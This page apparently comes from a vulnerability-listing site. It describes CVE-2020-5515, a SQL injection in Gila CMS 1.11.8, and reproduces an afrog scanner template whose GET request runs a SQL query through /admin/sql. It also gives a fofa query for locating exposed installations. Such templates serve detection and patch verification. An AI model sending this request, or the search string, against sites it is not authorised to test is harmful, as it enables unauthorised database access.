CVE-2020-5515: Gila CMS 1.11.8 SQL Injection.

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Gila CMS 1.11.8 SQL Injection. fofa: "Gila CMS"

PoC代码[已公开]

id: CVE-2020-5515

info:
  name: Gila CMS 1.11.8 SQL Injection.
  author: PickledFish
  severity: high
  description: |-
    Gila CMS 1.11.8 SQL Injection.
    fofa: "Gila CMS"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5515
  tags: cve,cve2020,gila,sqli
  created: 2023/08/17

set:
  r1: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /admin/sql?query=SELECT%20md5({{r1}})
    expression: response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-5515.yaml